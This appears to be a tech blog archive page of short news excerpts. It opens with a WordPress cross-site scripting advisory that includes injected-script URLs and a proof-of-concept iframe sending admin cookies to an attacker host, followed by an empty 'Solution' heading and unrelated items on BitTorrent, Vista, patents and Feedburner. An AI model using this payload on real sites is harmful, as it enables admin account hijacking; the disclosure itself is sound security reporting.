A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary code execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is a proof-of-concept code to steal the admin cookies:
<iframe width=”0″ height=”0″ src=”http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27″></iframe>
Solution:

Not exactly a spy, but “Live”. This WordPress plugin lets you watch your website activity in real time. You can watch what people are doing on your site - which page they are visiting, are they leaving comments, or are they grabbing your feeds.
Each page hit, RSS hit, and comment slowly scrolls onto a canvas. […]

BitTorrent has announced that they will compete with the BitTorrent by rolling out a licensed entertainment network as well as an enhanced protocol so as to compete with the millions of copyrighted files being traded around the Internet.
BitTorrent, founded in mid-2004 by Bram Cohen and Ashwin Navin, aims to offer close to 3,000 movies and […]

I’ve been after an expired domain since the past month now. I’ve been mostly secretive about it and haven’t told anyone. Recently, I was browsing TDNAM when something really caught hold of my eye. There it was, at the right hand corner, under the title “Most Active Auctions” was the domain ProBlogger.com.

Good news for all you Vista fanatics and probable buyers, in light of recent speculations that there are many softwares that don’t work with Windows Vista, Microsoft has gone ahead to publish a list of applications that have earned the “Certified for Windows Vista” or the “Works with Windows Vista” logo.
The list applies to both 32-bit and 64-bit versions of Vista.

Good news for WordPress.com blog owners, you can now add a ‘Digg It’ button to all your posts and let others Digg your story. That means no more tinkering with HTML or copy-pasting codes into each post.
Before you get excited and rush to your WordPress blogs, hold on - there’s a catch.

Paris-based telecom equipment maker Alcatel-Lucent has won a patent case against Microsoft. A federal district court jury set damages at $1.52 billion on Thursday, according to reports.

Apple, Sandisk and Samsung will have to get ready for a court battle, cause Texas MP3 Technologies Ltd., a company based in Marshall, Texas, is suing for breaching what it claims to be its copyright of the MP3 player concept.

Alright, the first thing you may have noticed is that we’re not running the Binary theme anymore. If you have subscribed to our feeds, then you’d have noticed those ridiculous test messages being sent out by our team. I’d like to apologise for all those, we’ve been having a really bad day since the past […]

Everybody’s favourite Feedburner, has gone for a toss since the past day. Yesterday, when I logged in to check my account, I was shocked to see all my feeds showing zero subscribers!

Today, my Headlines Rotator - the little widget (if you may call so), was not showing up. Upon visiting the site, it was learnt […]